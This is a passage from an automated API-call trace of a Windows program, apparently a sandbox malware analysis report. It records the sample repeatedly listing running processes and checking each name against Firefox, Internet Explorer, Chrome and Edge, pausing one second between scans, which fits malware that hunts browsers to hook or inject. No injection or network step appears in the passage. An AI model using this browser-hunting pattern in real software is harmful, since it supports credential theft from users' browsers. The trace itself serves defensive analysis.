pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0222.983] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0222.983] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0222.983] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0222.983] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.983] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0222.983] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0222.983] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0222.983] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0222.983] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.983] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0222.984] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0222.984] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0222.984] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0222.984] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.984] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0222.984] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0222.984] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0222.985] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0222.985] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.985] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0222.985] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0222.985] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0222.985] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0222.985] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.985] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0222.986] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0222.986] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0222.986] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0222.986] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.986] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0222.986] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0222.986] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0222.986] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0222.986] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.986] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0222.987] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0222.987] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0222.987] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0222.987] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.987] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0222.987] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0222.987] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0222.987] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0222.987] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.987] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0222.988] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0222.988] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0222.988] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0222.988] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.988] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0222.989] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0222.989] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0222.989] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0222.989] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.989] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0222.989] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0222.989] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0222.989] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0222.989] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.989] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0222.990] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0222.990] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0222.990] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0222.990] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.990] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0222.990] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0222.990] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0222.990] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0222.990] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.990] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0222.991] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0222.991] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0222.991] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0222.991] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.991] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0222.991] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0222.991] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0222.991] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0222.991] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.991] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.992] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0222.992] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0222.992] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0222.992] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.992] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.992] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.992] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.992] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.992] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.992] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0222.993] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0222.993] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0222.993] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0222.993] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.993] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0222.994] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0222.994] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0222.994] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0222.994] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.994] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0222.994] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0222.994] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0222.994] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0222.994] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.994] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.995] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0222.995] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0222.995] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0222.995] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.995] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0222.995] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0222.995] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0222.995] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0222.995] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.995] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0222.996] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0222.996] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0222.996] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0222.996] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0222.996] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.997] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0222.997] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0222.997] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0222.997] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.997] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.997] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0222.997] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0222.997] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0222.997] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.997] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0222.998] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0222.998] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0222.998] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0222.998] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0222.998] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.073] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0223.073] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0223.073] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0223.073] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0223.073] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0223.074] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0223.074] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0223.074] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0223.074] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0223.074] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0223.074] CloseHandle (hObject=0xd4) returned 1 [0223.074] Sleep (dwMilliseconds=0x3e8) [0224.087] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0224.089] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.090] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0224.090] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0224.090] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0224.090] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0224.090] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0224.090] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0224.090] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0224.090] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0224.090] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0224.090] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0224.091] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0224.091] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0224.091] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0224.091] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.091] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0224.091] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0224.091] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0224.091] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.091] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0224.092] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0224.092] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0224.092] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0224.092] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.092] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0224.093] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0224.093] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0224.093] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0224.093] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0224.093] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0224.093] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0224.093] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0224.093] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.093] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0224.094] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0224.094] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0224.094] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0224.094] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0224.094] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0224.094] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0224.094] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0224.094] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.094] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0224.095] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0224.095] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0224.095] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0224.095] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0224.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.095] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0224.095] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0224.095] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0224.095] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0224.095] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.096] 